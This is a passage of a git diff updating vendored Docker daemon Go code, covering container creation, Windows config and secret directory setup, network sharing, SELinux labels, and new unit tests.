+ status := <-cntr.Wait(ctx, container.WaitConditionNotRunning) + if status.Err() != nil { // Ensure that we don't kill ourselves - if pid := container.GetPID(); pid != 0 { - logrus.Infof("Container %s failed to exit within 10 seconds of kill - trying direct SIGKILL", stringid.TruncateID(container.ID)) - if err := syscall.Kill(pid, 9); err != nil { - if err != syscall.ESRCH { + if pid := cntr.GetPID(); pid != 0 { + logrus.Infof("Container %s failed to exit within 10 seconds of kill - trying direct SIGKILL", stringid.TruncateID(cntr.ID)) + if err := unix.Kill(pid, 9); err != nil { + if err != unix.ESRCH { return err } e := errNoSuchProcess{pid, 9} @@ -240,7 +352,7 @@ func killProcessDirectly(container *container.Container) error { } func detachMounted(path string) error { - return syscall.Unmount(path, syscall.MNT_DETACH) + return unix.Unmount(path, unix.MNT_DETACH) } func isLinkable(child *container.Container) bool { @@ -274,8 +386,18 @@ func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[] return nil } -func initializeNetworkingPaths(container *container.Container, nc *container.Container) { +func (daemon *Daemon) initializeNetworkingPaths(container *container.Container, nc *container.Container) error { container.HostnamePath = nc.HostnamePath container.HostsPath = nc.HostsPath container.ResolvConfPath = nc.ResolvConfPath + return nil +} + +func (daemon *Daemon) setupContainerMountsRoot(c *container.Container) error { + // get the root mount path so we can make it unbindable + p, err := c.MountsResourcePath("") + if err != nil { + return err + } + return idtools.MkdirAllAndChown(p, 0700, daemon.idMappings.RootPair()) } diff --git a/vendor/github.com/docker/docker/daemon/container_operations_windows.go b/vendor/github.com/docker/docker/daemon/container_operations_windows.go index d05f251e05..562528a8ef 100644 --- a/vendor/github.com/docker/docker/daemon/container_operations_windows.go +++ 
b/vendor/github.com/docker/docker/daemon/container_operations_windows.go @@ -1,20 +1,67 @@ -// +build windows - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "fmt" + "io/ioutil" + "os" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/system" "github.com/docker/libnetwork" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { return nil, nil } -// getSize returns real size & virtual size -func (daemon *Daemon) getSize(container *container.Container) (int64, int64) { - // TODO Windows - return 0, 0 +func (daemon *Daemon) setupConfigDir(c *container.Container) (setupErr error) { + if len(c.ConfigReferences) == 0 { + return nil + } + + localPath := c.ConfigsDirPath() + logrus.Debugf("configs: setting up config dir: %s", localPath) + + // create local config root + if err := system.MkdirAllWithACL(localPath, 0, system.SddlAdministratorsLocalSystem); err != nil { + return errors.Wrap(err, "error creating config dir") + } + + defer func() { + if setupErr != nil { + if err := os.RemoveAll(localPath); err != nil { + logrus.Errorf("error cleaning up config dir: %s", err) + } + } + }() + + if c.DependencyStore == nil { + return fmt.Errorf("config store is not initialized") + } + + for _, configRef := range c.ConfigReferences { + // TODO (ehazlett): use type switch when more are supported + if configRef.File == nil { + logrus.Error("config target type is not a file target") + continue + } + + fPath := c.ConfigFilePath(*configRef) + log := logrus.WithFields(logrus.Fields{"name": configRef.File.Name, "path": fPath}) + + log.Debug("injecting config") + config, err := c.DependencyStore.Configs().Get(configRef.ConfigID) + if err != nil { + return errors.Wrap(err, "unable to get config from config store") + } + if err := ioutil.WriteFile(fPath, config.Spec.Data, configRef.File.Mode); err != nil { + return errors.Wrap(err, 
"error injecting config") + } + } + + return nil } func (daemon *Daemon) setupIpcDirs(container *container.Container) error { @@ -35,6 +82,63 @@ func detachMounted(path string) error { return nil } +func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) { + if len(c.SecretReferences) == 0 { + return nil + } + + localMountPath, err := c.SecretMountPath() + if err != nil { + return err + } + logrus.Debugf("secrets: setting up secret dir: %s", localMountPath) + + // create local secret root + if err := system.MkdirAllWithACL(localMountPath, 0, system.SddlAdministratorsLocalSystem); err != nil { + return errors.Wrap(err, "error creating secret local directory") + } + + defer func() { + if setupErr != nil { + if err := os.RemoveAll(localMountPath); err != nil { + logrus.Errorf("error cleaning up secret mount: %s", err) + } + } + }() + + if c.DependencyStore == nil { + return fmt.Errorf("secret store is not initialized") + } + + for _, s := range c.SecretReferences { + // TODO (ehazlett): use type switch when more are supported + if s.File == nil { + logrus.Error("secret target type is not a file target") + continue + } + + // secrets are created in the SecretMountPath on the host, at a + // single level + fPath, err := c.SecretFilePath(*s) + if err != nil { + return err + } + logrus.WithFields(logrus.Fields{ + "name": s.File.Name, + "path": fPath, + }).Debug("injecting secret") + secret, err := c.DependencyStore.Secrets().Get(s.SecretID) + if err != nil { + return errors.Wrap(err, "unable to get secret from secret store") + } + if err := ioutil.WriteFile(fPath, secret.Spec.Data, s.File.Mode); err != nil { + return errors.Wrap(err, "error injecting secret") + } + } + + return nil +} + func killProcessDirectly(container *container.Container) error { return nil } @@ -48,12 +152,50 @@ func enableIPOnPredefinedNetwork() bool { } func (daemon *Daemon) isNetworkHotPluggable() bool { - return false + return true } func 
setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error { return nil } -func initializeNetworkingPaths(container *container.Container, nc *container.Container) { +func (daemon *Daemon) initializeNetworkingPaths(container *container.Container, nc *container.Container) error { + + if nc.HostConfig.Isolation.IsHyperV() { + return fmt.Errorf("sharing of hyperv containers network is not supported") + } + + container.NetworkSharedContainerID = nc.ID + + if nc.NetworkSettings != nil { + for n := range nc.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(n) + if err != nil { + continue + } + + ep, err := getEndpointInNetwork(nc.Name, sn) + if err != nil { + continue + } + + data, err := ep.DriverInfo() + if err != nil { + continue + } + + if data["GW_INFO"] != nil { + gwInfo := data["GW_INFO"].(map[string]interface{}) + if gwInfo["hnsid"] != nil { + container.SharedEndpointList = append(container.SharedEndpointList, gwInfo["hnsid"].(string)) + } + } + + if data["hnsid"] != nil { + container.SharedEndpointList = append(container.SharedEndpointList, data["hnsid"].(string)) + } + } + } + + return nil } diff --git a/vendor/github.com/docker/docker/daemon/container_unix_test.go b/vendor/github.com/docker/docker/daemon/container_unix_test.go new file mode 100644 index 0000000000..b4c5f84c7e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_unix_test.go @@ -0,0 +1,44 @@ +// +build linux freebsd + +package daemon + +import ( + "testing" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/daemon/config" + "github.com/docker/go-connections/nat" + "gotest.tools/assert" +) + +// TestContainerWarningHostAndPublishPorts that a warning is returned when setting network mode to host and specifying published ports. +// This should not be tested on Windows because Windows doesn't support "host" network mode. 
+func TestContainerWarningHostAndPublishPorts(t *testing.T) { + testCases := []struct { + ports nat.PortMap + warnings []string + }{ + {ports: nat.PortMap{}}, + {ports: nat.PortMap{ + "8080": []nat.PortBinding{{HostPort: "8989"}}, + }, warnings: []string{"Published ports are discarded when using host network mode"}}, + } + + for _, tc := range testCases { + hostConfig := &containertypes.HostConfig{ + Runtime: "runc", + NetworkMode: "host", + PortBindings: tc.ports, + } + cs := &config.Config{ + CommonUnixConfig: config.CommonUnixConfig{ + Runtimes: map[string]types.Runtime{"runc": {}}, + }, + } + d := &Daemon{configStore: cs} + wrns, err := d.verifyContainerSettings("", hostConfig, &containertypes.Config{}, false) + assert.NilError(t, err) + assert.DeepEqual(t, tc.warnings, wrns) + } +} diff --git a/vendor/github.com/docker/docker/daemon/container_windows.go b/vendor/github.com/docker/docker/daemon/container_windows.go new file mode 100644 index 0000000000..0ca8039dd6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_windows.go @@ -0,0 +1,9 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/docker/container" +) + +func (daemon *Daemon) saveApparmorConfig(container *container.Container) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/create.go b/vendor/github.com/docker/docker/daemon/create.go index c71d14e5fc..6702243faf 100644 --- a/vendor/github.com/docker/docker/daemon/create.go +++ b/vendor/github.com/docker/docker/daemon/create.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -7,21 +7,18 @@ import ( "strings" "time" - "github.com/pkg/errors" - - "github.com/Sirupsen/logrus" - apierrors "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" networktypes "github.com/docker/docker/api/types/network" 
"github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" - "github.com/docker/docker/layer" "github.com/docker/docker/pkg/idtools" - "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" "github.com/docker/docker/runconfig" - volumestore "github.com/docker/docker/volume/store" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // CreateManagedContainer creates a container that is managed by a Service @@ -37,17 +34,31 @@ func (daemon *Daemon) ContainerCreate(params types.ContainerCreateConfig) (conta func (daemon *Daemon) containerCreate(params types.ContainerCreateConfig, managed bool) (containertypes.ContainerCreateCreatedBody, error) { start := time.Now() if params.Config == nil { - return containertypes.ContainerCreateCreatedBody{}, fmt.Errorf("Config cannot be empty in order to create a container") + return containertypes.ContainerCreateCreatedBody{}, errdefs.InvalidParameter(errors.New("Config cannot be empty in order to create a container")) + } + + os := runtime.GOOS + if params.Config.Image != "" { + img, err := daemon.imageService.GetImage(params.Config.Image) + if err == nil { + os = img.OS + } + } else { + // This mean scratch. On Windows, we can safely assume that this is a linux + // container. 
On other platforms, it's the host OS (which it already is) + if runtime.GOOS == "windows" && system.LCOWSupported() { + os = "linux" + } } - warnings, err := daemon.verifyContainerSettings(params.HostConfig, params.Config, false) + warnings, err := daemon.verifyContainerSettings(os, params.HostConfig, params.Config, false) if err != nil { - return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, errdefs.InvalidParameter(err) } - err = daemon.verifyNetworkingConfig(params.NetworkingConfig) + err = verifyNetworkingConfig(params.NetworkingConfig) if err != nil { - return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, errdefs.InvalidParameter(err) } if params.HostConfig == nil { @@ -55,12 +66,12 @@ func (daemon *Daemon) containerCreate(params types.ContainerCreateConfig, manage } err = daemon.adaptContainerSettings(params.HostConfig, params.AdjustCPUShares) if err != nil { - return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, errdefs.InvalidParameter(err) } container, err := daemon.create(params, managed) if err != nil { - return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, daemon.imageNotExistToErrcode(err) + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err } containerActions.WithValues("create").UpdateSince(start) @@ -76,27 +87,40 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) ( err error ) + os := runtime.GOOS if params.Config.Image != "" { - img, err = daemon.GetImage(params.Config.Image) + img, err = daemon.imageService.GetImage(params.Config.Image) if err != nil { return nil, err } - - if runtime.GOOS == "solaris" && img.OS != "solaris " { - return nil, errors.New("Platform on which parent image was created is not 
Solaris") + if img.OS != "" { + os = img.OS + } else { + // default to the host OS except on Windows with LCOW + if runtime.GOOS == "windows" && system.LCOWSupported() { + os = "linux" + } } imgID = img.ID() + + if runtime.GOOS == "windows" && img.OS == "linux" && !system.LCOWSupported() { + return nil, errors.New("operating system on which parent image was created is not Windows") + } + } else { + if runtime.GOOS == "windows" { + os = "linux" // 'scratch' case. + } } if err := daemon.mergeAndVerifyConfig(params.Config, img); err != nil { - return nil, err + return nil, errdefs.InvalidParameter(err) } if err := daemon.mergeAndVerifyLogConfig(¶ms.HostConfig.LogConfig); err != nil { - return nil, err + return nil, errdefs.InvalidParameter(err) } - if container, err = daemon.newContainer(params.Name, params.Config, params.HostConfig, imgID, managed); err != nil { + if container, err = daemon.newContainer(params.Name, os, params.Config, params.HostConfig, imgID, managed); err != nil { return nil, err } defer func() { @@ -113,19 +137,35 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) ( container.HostConfig.StorageOpt = params.HostConfig.StorageOpt - // Set RWLayer for container after mount labels have been set - if err := daemon.setRWLayer(container); err != nil { - return nil, err + // Fixes: https://github.com/moby/moby/issues/34074 and + // https://github.com/docker/for-win/issues/999. + // Merge the daemon's storage options if they aren't already present. We only + // do this on Windows as there's no effective sandbox size limit other than + // physical on Linux. 
+ if runtime.GOOS == "windows" { + if container.HostConfig.StorageOpt == nil { + container.HostConfig.StorageOpt = make(map[string]string) + } + for _, v := range daemon.configStore.GraphOptions { + opt := strings.SplitN(v, "=", 2) + if _, ok := container.HostConfig.StorageOpt[opt[0]]; !ok { + container.HostConfig.StorageOpt[opt[0]] = opt[1] + } + } } - rootUID, rootGID, err := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps) + // Set RWLayer for container after mount labels have been set + rwLayer, err := daemon.imageService.CreateLayer(container, setupInitLayer(daemon.idMappings)) if err != nil { - return nil, err + return nil, errdefs.System(err) } - if err := idtools.MkdirAs(container.Root, 0700, rootUID, rootGID); err != nil { + container.RWLayer = rwLayer + + rootIDs := daemon.idMappings.RootPair() + if err := idtools.MkdirAndChown(container.Root, 0700, rootIDs); err != nil { return nil, err } - if err := idtools.MkdirAs(container.CheckpointDir(), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(container.CheckpointDir(), 0700, rootIDs); err != nil { return nil, err } @@ -133,7 +173,7 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) ( return nil, err } - if err := daemon.createContainerPlatformSpecificSettings(container, params.Config, params.HostConfig); err != nil { + if err := daemon.createContainerOSSpecificSettings(container, params.Config, params.HostConfig); err != nil { return nil, err } @@ -143,24 +183,37 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) ( } // Make sure NetworkMode has an acceptable value. We do this to ensure // backwards API compatibility. 
- container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig) + runconfig.SetDefaultNetModeIfBlank(container.HostConfig) daemon.updateContainerNetworkSettings(container, endpointsConfigs) - - if err := container.ToDisk(); err != nil { - logrus.Errorf("Error saving new container to disk: %v", err) - return nil, err - } if err := daemon.Register(container); err != nil { return nil, err } + stateCtr.set(container.ID, "stopped") daemon.LogContainerEvent(container, "create") return container, nil } -func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMode containertypes.PidMode, privileged bool) ([]string, error) { +func toHostConfigSelinuxLabels(labels []string) []string { + for i, l := range labels { + labels[i] = "label=" + l + } + return labels +} + +func (daemon *Daemon) generateSecurityOpt(hostConfig *containertypes.HostConfig) ([]string, error) { + for _, opt := range hostConfig.SecurityOpt { + con := strings.Split(opt, "=") + if con[0] == "label" { + // Caller overrode SecurityOpts + return nil, nil + } + } + ipcMode := hostConfig.IpcMode + pidMode := hostConfig.PidMode + privileged := hostConfig.Privileged if ipcMode.IsHost() || pidMode.IsHost() || privileged { - return label.DisableSecOpt(), nil + return toHostConfigSelinuxLabels(label.DisableSecOpt()), nil } var ipcLabel []string @@ -174,7 +227,7 @@ func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMod } ipcLabel = label.DupSecOpt(c.ProcessLabel) if pidContainer == "" { - return ipcLabel, err + return toHostConfigSelinuxLabels(ipcLabel), err } } if pidContainer != "" { @@ -185,7 +238,7 @@ func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMod pidLabel = label.DupSecOpt(c.ProcessLabel) if ipcContainer == "" { - return pidLabel, err + return toHostConfigSelinuxLabels(pidLabel), err } } @@ -195,52 +248,11 @@ func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMod return nil, 
fmt.Errorf("--ipc and --pid containers SELinux labels aren't the same") } } - return pidLabel, nil + return toHostConfigSelinuxLabels(pidLabel), nil } return nil, nil } -func (daemon *Daemon) setRWLayer(container *container.Container) error { - var layerID layer.ChainID - if container.ImageID != "" { - img, err := daemon.imageStore.Get(container.ImageID) - if err != nil { - return err - } - layerID = img.RootFS.ChainID() - } - - rwLayer, err := daemon.layerStore.CreateRWLayer(container.ID, layerID, container.MountLabel, daemon.getLayerInit(), container.HostConfig.StorageOpt) - - if err != nil { - return err - } - container.RWLayer = rwLayer - - return nil -} - -// VolumeCreate creates a volume with the specified name, driver, and opts -// This is called directly from the Engine API -func (daemon *Daemon) VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) { - if name == "" { - name = stringid.GenerateNonCryptoID() - } - - v, err := daemon.volumes.Create(name, driverName, opts, labels) - if err != nil { - if volumestore.IsNameConflict(err) { - return nil, fmt.Errorf("A volume named %s already exists. 
Choose a different volume name.", name) - } - return nil, err - } - - daemon.LogVolumeEvent(v.Name(), "create", map[string]string{"driver": v.DriverName()}) - apiV := volumeToAPIType(v) - apiV.Mountpoint = v.Path() - return apiV, nil -} - func (daemon *Daemon) mergeAndVerifyConfig(config *containertypes.Config, img *image.Image) error { if img != nil && img.Config != nil { if err := merge(config, img.Config); err != nil { @@ -259,22 +271,25 @@ func (daemon *Daemon) mergeAndVerifyConfig(config *containertypes.Config, img *i // Checks if the client set configurations for more than one network while creating a container // Also checks if the IPAMConfig is valid -func (daemon *Daemon) verifyNetworkingConfig(nwConfig *networktypes.NetworkingConfig) error { +func verifyNetworkingConfig(nwConfig *networktypes.NetworkingConfig) error { if nwConfig == nil || len(nwConfig.EndpointsConfig) == 0 { return nil } if len(nwConfig.EndpointsConfig) == 1 { - for _, v := range nwConfig.EndpointsConfig { - if v != nil && v.IPAMConfig != nil { + for k, v := range nwConfig.EndpointsConfig { + if v == nil { + return errdefs.InvalidParameter(errors.Errorf("no EndpointSettings for %s", k)) + } + if v.IPAMConfig != nil { if v.IPAMConfig.IPv4Address != "" && net.ParseIP(v.IPAMConfig.IPv4Address).To4() == nil { - return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv4 address: %s", v.IPAMConfig.IPv4Address)) + return errors.Errorf("invalid IPv4 address: %s", v.IPAMConfig.IPv4Address) } if v.IPAMConfig.IPv6Address != "" { n := net.ParseIP(v.IPAMConfig.IPv6Address) // if the address is an invalid network address (ParseIP == nil) or if it is // an IPv4 address (To4() != nil), then it is an invalid IPv6 address if n == nil || n.To4() != nil { - return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv6 address: %s", v.IPAMConfig.IPv6Address)) + return errors.Errorf("invalid IPv6 address: %s", v.IPAMConfig.IPv6Address) } } } @@ -285,6 +300,5 @@ func (daemon *Daemon) 
verifyNetworkingConfig(nwConfig *networktypes.NetworkingCo for k := range nwConfig.EndpointsConfig { l = append(l, k) } - err := fmt.Errorf("Container cannot be connected to network endpoints: %s", strings.Join(l, ", ")) - return apierrors.NewBadRequestError(err) + return errors.Errorf("Container cannot be connected to network endpoints: %s", strings.Join(l, ", ")) } diff --git a/vendor/github.com/docker/docker/daemon/create_test.go b/vendor/github.com/docker/docker/daemon/create_test.go new file mode 100644 index 0000000000..3dba847d46 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/create_test.go @@ -0,0 +1,21 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "testing" + + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/errdefs" + "gotest.tools/assert" +) + +// Test case for 35752 +func TestVerifyNetworkingConfig(t *testing.T) { + name := "mynet" + endpoints := make(map[string]*network.EndpointSettings, 1) + endpoints[name] = nil + nwConfig := &network.NetworkingConfig{ + EndpointsConfig: endpoints, + } + err := verifyNetworkingConfig(nwConfig) + assert.Check(t, errdefs.IsInvalidParameter(err)) +} diff --git a/vendor/github.com/docker/docker/daemon/create_unix.go b/vendor/github.com/docker/docker/daemon/create_unix.go index 2fe5c98a79..eb9b653730 100644 --- a/vendor/github.com/docker/docker/daemon/create_unix.go +++ b/vendor/github.com/docker/docker/daemon/create_unix.go @@ -1,32 +1,45 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "os" "path/filepath" - "github.com/Sirupsen/logrus" containertypes "github.com/docker/docker/api/types/container" mounttypes "github.com/docker/docker/api/types/mount" "github.com/docker/docker/container" + "github.com/docker/docker/oci" "github.com/docker/docker/pkg/stringid" - "github.com/opencontainers/runc/libcontainer/label" + volumeopts "github.com/docker/docker/volume/service/opts" + 
"github.com/opencontainers/selinux/go-selinux/label" + "github.com/sirupsen/logrus" ) -// createContainerPlatformSpecificSettings performs platform specific container create functionality -func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { +// createContainerOSSpecificSettings performs host-OS specific container create functionality +func (daemon *Daemon) createContainerOSSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { if err := daemon.Mount(container); err != nil { return err } defer daemon.Unmount(container) - rootUID, rootGID := daemon.GetRemappedUIDGID() - if err := container.SetupWorkingDirectory(rootUID, rootGID); err != nil { + rootIDs := daemon.idMappings.RootPair() + if err := container.SetupWorkingDirectory(rootIDs); err != nil { return err } + // Set the default masked and readonly paths with regard to the host config options if they are not set. 
+ if hostConfig.MaskedPaths == nil && !hostConfig.Privileged { + hostConfig.MaskedPaths = oci.DefaultSpec().Linux.MaskedPaths // Set it to the default if nil + container.HostConfig.MaskedPaths = hostConfig.MaskedPaths + } + if hostConfig.ReadonlyPaths == nil && !hostConfig.Privileged { + hostConfig.ReadonlyPaths = oci.DefaultSpec().Linux.ReadonlyPaths // Set it to the default if nil + container.HostConfig.ReadonlyPaths = hostConfig.ReadonlyPaths + } + for spec := range config.Volumes { name := stringid.GenerateNonCryptoID() destination := filepath.Clean(spec) @@ -46,16 +59,16 @@ func (daemon *Daemon) createContainerPlatformSpecificSettings(container *contain return fmt.Errorf("cannot mount volume over existing file, file exists %s", path) } - v, err := daemon.volumes.CreateWithRef(name, hostConfig.VolumeDriver, container.ID, nil, nil) + v, err := daemon.volumes.Create(context.TODO(), name, hostConfig.VolumeDriver, volumeopts.WithCreateReference(container.ID)) if err != nil { return err } - if err := label.Relabel(v.Path(), container.MountLabel, true); err != nil { + if err := label.Relabel(v.Mountpoint, container.MountLabel, true); err != nil { return err } - container.AddMountPointWithVolume(destination, v, true) + container.AddMountPointWithVolume(destination, &volumeWrapper{v: v, s: daemon.volumes}, true) } return daemon.populateVolumes(container) } diff --git a/vendor/github.com/docker/docker/daemon/create_windows.go b/vendor/github.com/docker/docker/daemon/create_windows.go index bbf0dbe7b9..37e425a014 100644 --- a/vendor/github.com/docker/docker/daemon/create_windows.go +++ b/vendor/github.com/docker/docker/daemon/create_windows.go @@ -1,24 +1,37 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" + "runtime" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/volume" + volumemounts 
"github.com/docker/docker/volume/mounts" + volumeopts "github.com/docker/docker/volume/service/opts" ) -// createContainerPlatformSpecificSettings performs platform specific container create functionality -func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { - // Make sure the host config has the default daemon isolation if not specified by caller. - if containertypes.Isolation.IsDefault(containertypes.Isolation(hostConfig.Isolation)) { - hostConfig.Isolation = daemon.defaultIsolation - } +// createContainerOSSpecificSettings performs host-OS specific container create functionality +func (daemon *Daemon) createContainerOSSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { + if container.OS == runtime.GOOS { + // Make sure the host config has the default daemon isolation if not specified by caller. + if containertypes.Isolation.IsDefault(containertypes.Isolation(hostConfig.Isolation)) { + hostConfig.Isolation = daemon.defaultIsolation + } + } else { + // LCOW must be a Hyper-V container as you can't run a shared kernel when one + // is a Windows kernel, the other is a Linux kernel. + if containertypes.Isolation.IsProcess(containertypes.Isolation(hostConfig.Isolation)) { + return fmt.Errorf("process isolation is invalid for Linux containers on Windows") + } + hostConfig.Isolation = "hyperv" + } + parser := volumemounts.NewParser(container.OS) for spec := range config.Volumes { - mp, err := volume.ParseMountRaw(spec, hostConfig.VolumeDriver) + mp, err := parser.ParseMountRaw(spec, hostConfig.VolumeDriver) if err != nil { return fmt.Errorf("Unrecognised volume spec: %v", err) } @@ -38,7 +51,7 @@ func (daemon *Daemon) createContainerPlatformSpecificSettings(container *contain // Create the volume in the volume driver. If it doesn't exist, // a new one will be created. 
- v, err := daemon.volumes.CreateWithRef(mp.Name, volumeDriver, container.ID, nil, nil) + v, err := daemon.volumes.Create(context.TODO(), mp.Name, volumeDriver, volumeopts.WithCreateReference(container.ID)) if err != nil { return err } @@ -74,7 +87,7 @@ func (daemon *Daemon) createContainerPlatformSpecificSettings(container *contain // } // Add it to container.MountPoints - container.AddMountPointWithVolume(mp.Destination, v, mp.RW) + container.AddMountPointWithVolume(mp.Destination, &volumeWrapper{v: v, s: daemon.volumes}, mp.RW) } return nil } diff --git a/vendor/github.com/docker/docker/daemon/daemon.go b/vendor/github.com/docker/docker/daemon/daemon.go index 55a66aec92..5e5f586ae0 100644 --- a/vendor/github.com/docker/docker/daemon/daemon.go +++ b/vendor/github.com/docker/docker/daemon/daemon.go @@ -3,10 +3,10 @@ // // In implementing the various functions of the daemon, there is often // a method-specific struct for configuring the runtime behavior. -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "encoding/json" + "context" "fmt" "io/ioutil" "net" @@ -18,111 +18,120 @@ import ( "sync" "time" - "github.com/Sirupsen/logrus" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/docker/docker/api" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/builder" "github.com/docker/docker/container" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/discovery" "github.com/docker/docker/daemon/events" "github.com/docker/docker/daemon/exec" - "github.com/docker/docker/daemon/initlayer" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/plugin" - "github.com/docker/libnetwork/cluster" + "github.com/docker/docker/daemon/images" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/network" + "github.com/docker/docker/errdefs" + 
"github.com/sirupsen/logrus" // register graph drivers _ "github.com/docker/docker/daemon/graphdriver/register" + "github.com/docker/docker/daemon/stats" dmetadata "github.com/docker/docker/distribution/metadata" - "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/dockerversion" "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/libcontainerd" "github.com/docker/docker/migrate/v1" - "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/locker" "github.com/docker/docker/pkg/plugingetter" - "github.com/docker/docker/pkg/registrar" - "github.com/docker/docker/pkg/signal" "github.com/docker/docker/pkg/sysinfo" "github.com/docker/docker/pkg/system" "github.com/docker/docker/pkg/truncindex" - "github.com/docker/docker/reference" + "github.com/docker/docker/plugin" + pluginexec "github.com/docker/docker/plugin/executor/containerd" + refstore "github.com/docker/docker/reference" "github.com/docker/docker/registry" "github.com/docker/docker/runconfig" - volumedrivers "github.com/docker/docker/volume/drivers" - "github.com/docker/docker/volume/local" - "github.com/docker/docker/volume/store" + volumesservice "github.com/docker/docker/volume/service" "github.com/docker/libnetwork" + "github.com/docker/libnetwork/cluster" nwconfig "github.com/docker/libnetwork/config" - "github.com/docker/libtrust" "github.com/pkg/errors" ) -var ( - // DefaultRuntimeBinary is the default runtime to be used by - // containerd if none is specified - DefaultRuntimeBinary = "docker-runc" - - // DefaultInitBinary is the name of the default init binary - DefaultInitBinary = "docker-init" +// ContainersNamespace is the name of the namespace used for users containers +const ContainersNamespace = "moby" - errSystemNotSupported = fmt.Errorf("The Docker daemon is not supported on this platform.") +var ( + errSystemNotSupported = errors.New("the Docker daemon is not supported on this 
platform") ) // Daemon holds information about the Docker daemon. type Daemon struct { - ID string - repository string - containers container.Store - execCommands *exec.Store - referenceStore reference.Store - downloadManager *xfer.LayerDownloadManager - uploadManager *xfer.LayerUploadManager - distributionMetadataStore dmetadata.Store - trustKey libtrust.PrivateKey - idIndex *truncindex.TruncIndex - configStore *Config - statsCollector *statsCollector - defaultLogConfig containertypes.LogConfig - RegistryService registry.Service - EventsService *events.Events - netController libnetwork.NetworkController - volumes *store.VolumeStore - discoveryWatcher discoveryReloader - root string - seccompEnabled bool - shutdown bool - uidMaps []idtools.IDMap - gidMaps []idtools.IDMap - layerStore layer.Store - imageStore image.Store - PluginStore *plugin.Store // todo: remove - pluginManager *plugin.Manager - nameIndex *registrar.Registrar - linkIndex *linkIndex - containerd libcontainerd.Client - containerdRemote libcontainerd.Remote - defaultIsolation containertypes.Isolation // Default isolation mode on Windows - clusterProvider cluster.Provider - cluster Cluster + ID string + repository string + containers container.Store + containersReplica container.ViewDB + execCommands *exec.Store + imageService *images.ImageService + idIndex *truncindex.TruncIndex + configStore *config.Config + statsCollector *stats.Collector + defaultLogConfig containertypes.LogConfig + RegistryService registry.Service + EventsService *events.Events + netController libnetwork.NetworkController + volumes *volumesservice.VolumesService + discoveryWatcher discovery.Reloader + root string + seccompEnabled bool + apparmorEnabled bool + shutdown bool + idMappings *idtools.IDMappings + // TODO: move graphDrivers field to an InfoService + graphDrivers map[string]string // By operating system + + PluginStore *plugin.Store // todo: remove + pluginManager *plugin.Manager + linkIndex *linkIndex + containerd 
